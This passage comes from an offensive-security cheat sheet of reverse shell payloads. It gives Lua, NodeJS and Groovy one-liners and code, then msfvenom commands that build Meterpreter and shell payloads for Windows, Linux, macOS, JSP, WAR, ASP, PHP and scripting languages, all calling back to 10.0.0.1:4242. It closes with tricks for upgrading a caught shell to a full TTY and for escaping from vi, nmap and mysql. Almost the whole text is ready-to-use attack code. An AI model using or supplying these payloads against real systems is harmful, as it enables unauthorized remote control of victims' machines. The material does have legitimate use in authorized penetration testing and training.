strings reverse.war | grep jsp # in order to get the name of the file</code></pre><h3 id="77c86889-9e90-490c-8c3d-fcfdd83a1158" class="">Lua</h3><p id="e522228d-60e1-4027-848f-737263968d33" class="">Linux only</p><pre id="24fff796-39b7-452d-b441-e56d6f7859e6" class="code"><code>lua -e &quot;require(&#x27;socket&#x27;);require(&#x27;os&#x27;);t=socket.tcp();t:connect(&#x27;10.0.0.1&#x27;,&#x27;4242&#x27;);os.execute(&#x27;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&#x27;);&quot;</code></pre><p id="a2313a17-ae6a-4b6f-a9bf-8606b945b7a9" class="">Windows and Linux</p><pre id="90dbb1f8-0d08-42c2-9437-e616105fc60a" class="code"><code>lua5.1 -e &#x27;local host, port = &quot;10.0.0.1&quot;, 4242 local socket = require(&quot;socket&quot;) local tcp = socket.tcp() local io = require(&quot;io&quot;) tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, &quot;r&quot;) local s = f:read(&quot;*a&quot;) f:close() tcp:send(s) if status == &quot;closed&quot; then break end end tcp:close()&#x27;</code></pre><h3 id="dca71594-f59d-474c-9f83-9e668db150d5" class="">NodeJS</h3><pre id="9b5e5b02-0f43-4ddd-9c3c-87cbf28613df" class="code"><code>(function(){
    var net = require(&quot;net&quot;),
        cp = require(&quot;child_process&quot;),
        sh = cp.spawn(&quot;/bin/sh&quot;, []);
    var client = new net.Socket();
    client.connect(4242, &quot;10.0.0.1&quot;, function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();


or

require(&#x27;child_process&#x27;).exec(&#x27;nc -e /bin/sh 10.0.0.1 4242&#x27;)

or

-var x = global.process.mainModule.require
-x(&#x27;child_process&#x27;).exec(&#x27;nc 10.0.0.1 4242 -e /bin/bash&#x27;)

or

https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py</code></pre><h3 id="1fba153a-4fb8-45e4-930f-17ca204e55f3" class="">Groovy</h3><p id="67420c15-ad45-4c52-b002-d55acb64a949" class="">by <a href="https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76">frohoff</a> NOTE: Java reverse shell also work for Groovy</p><pre id="44a2e57b-31da-4c16-904d-1999690050a4" class="code"><code>String host=&quot;10.0.0.1&quot;;
int port=4242;
String cmd=&quot;cmd.exe&quot;;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()&gt;0)so.write(pi.read());while(pe.available()&gt;0)so.write(pe.read());while(si.available()&gt;0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();</code></pre><h2 id="4d46d5cd-7502-433c-b891-b9364e2a3058" class="">Meterpreter Shell</h2><h3 id="44b06428-e84c-4d4b-a6f6-c1377a9546d9" class="">Windows Staged reverse TCP</h3><pre id="cff7645f-addd-49cd-80a6-2fc2b86bc678" class="code"><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe &gt; reverse.exe</code></pre><h3 id="8d0a3b41-5168-412f-b168-14eeb2427122" class="">Windows Stageless reverse TCP</h3><pre id="2cc24179-866b-4ba9-90f4-77f14b8ea34a" class="code"><code>msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f exe &gt; reverse.exe</code></pre><h3 id="f64d8b5b-4780-4222-a97e-07ce2a5d7fd4" class="">Linux Staged reverse TCP</h3><pre id="c7c6818a-6e01-40fd-a6d4-805b70ee24d9" class="code"><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf &gt;reverse.elf</code></pre><h3 id="7af1ee55-7bd8-48be-acd5-4a27be745ee5" class="">Linux Stageless reverse TCP</h3><pre id="19b5362c-163c-4404-81bf-c7d4765156c4" class="code"><code>msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf &gt;reverse.elf</code></pre><h3 id="e6a600ee-bae0-4cec-8c6f-12793d1dea6a" class="">Other platforms</h3><pre id="c6b4d246-0d37-44c7-8740-7aeef8ff6a61" class="code"><code>$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&quot;10.0.0.1&quot; LPORT=4242 -f elf &gt; shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=&quot;10.0.0.1&quot; LPORT=4242 -f exe &gt; shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST=&quot;10.0.0.1&quot; LPORT=4242 -f macho &gt; shell.macho
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=&quot;10.0.0.1&quot; LPORT=4242 -f asp &gt; shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=&quot;10.0.0.1&quot; LPORT=4242 -f raw &gt; shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=&quot;10.0.0.1&quot; LPORT=4242 -f war &gt; shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST=&quot;10.0.0.1&quot; LPORT=4242 -f raw &gt; shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST=&quot;10.0.0.1&quot; LPORT=4242 -f raw &gt; shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST=&quot;10.0.0.1&quot; LPORT=4242 -f raw &gt; shell.pl
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=&quot;10.0.0.1&quot; LPORT=4242 -f raw &gt; shell.php; cat shell.php | pbcopy &amp;&amp; echo &#x27;&lt;?php &#x27; | tr -d &#x27;\n&#x27; &gt; shell.php &amp;&amp; pbpaste &gt;&gt; shell.php</code></pre><h2 id="46b6e9cd-0835-4591-92bf-265df040df6e" class="">Spawn TTY Shell</h2><p id="ba9a0c8d-21f4-4578-b93b-fe0bcb4e14cf" class="">In order to catch a shell, you need to listen on the desired port. <code>rlwrap</code> will enhance the shell, allowing you to clear the screen with <code>[CTRL] + [L]</code>.</p><pre id="08de3037-56b5-4928-9b87-806c261ce827" class="code"><code>rlwrap nc 10.0.0.1 4242

rlwrap -r -f . nc 10.0.0.1 4242
-f . will make rlwrap use the current history file as a completion word list.
-r Put all words seen on in- and output on the completion list.</code></pre><p id="69cfaaa3-3b6e-42a4-973a-a80b0d669816" class="">Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell.</p><p id="f4335476-d0de-4f5c-92d5-fca5acbe8a4b" class="">⚠️ OhMyZSH might break this trick, a simple <code>sh</code> is recommended</p><blockquote id="24bfdc6d-cc20-4236-aab9-601f5476b548" class="">The main problem here is that zsh doesn&#x27;t handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect</blockquote><pre id="c8341fc0-fc1c-4acc-94b1-12d71b8f6a56" class="code"><code>ctrl+z
echo $TERM &amp;&amp; tput lines &amp;&amp; tput cols

# for bash
stty raw -echo
fg

# for zsh
stty raw -echo; fg

reset
export SHELL=bash
export TERM=xterm-256color
stty rows &lt;num&gt; columns &lt;cols&gt;</code></pre><p id="4d26617e-72be-408c-a036-386728a6dd4d" class="">or use <code>socat</code> binary to get a fully tty reverse shell</p><pre id="f02c0408-2eae-4f2e-857f-5144c71c6bd7" class="code"><code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code></pre><p id="00ebe4d9-f473-4b32-9c41-468026127130" class="">Spawn a TTY shell from an interpreter</p><pre id="5053119e-4cf5-4699-9357-87ad42a879af" class="code"><code>/bin/sh -i
python3 -c &#x27;import pty; pty.spawn(&quot;/bin/sh&quot;)&#x27;
perl -e &#x27;exec &quot;/bin/sh&quot;;&#x27;
perl: exec &quot;/bin/sh&quot;;
ruby: exec &quot;/bin/sh&quot;
lua: os.execute(&#x27;/bin/sh&#x27;)</code></pre><ul id="bc3cc9f8-4ba9-4459-812c-649e1895785d" class="bulleted-list"><li>vi: <code>:!bash</code></li></ul><ul id="b5cfc1a3-592d-4bff-a257-18cb046cb992" class="bulleted-list"><li>vi: <code>:set shell=/bin/bash:shell</code></li></ul><ul id="f15af558-cd86-4369-93ac-a7d8cefbf704" class="bulleted-list"><li>nmap: <code>!sh</code></li></ul><ul id="399203b7-6815-4d58-bf17-b33564897d2d" class="bulleted-list"><li>mysql: <code>! bash</code></li></ul><h2 id="d67a5216-6654-4990-b8ba-9fac9924227a" class="">References</h2><ul id="fe5ac527-2985-4121-ab07-38001865ac7f" class="bulleted-list"><li><a href="https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner">Reverse Bash Shell One Liner</a></li></ul><ul id="2338ee20-f2c5-4913-a707-a810dafd6ba7" class="bulleted-list"><li><a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">Pentest Monkey - Cheat Sheet Reverse shell</a></li></ul><ul id="701d4c0d-4946-4fa4-bca3-3ec98387efb8" class="bulleted-list"><li><a href="http://netsec.ws/?p=337">Spawning a TTY Shell</a></li></ul><ul id="f163b301-acdf-4402-8e30-226c8f5c6275" class="bulleted-list"><li><a href="https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell">Obtaining a fully interactive shell</a></li></ul></div></article></body></html>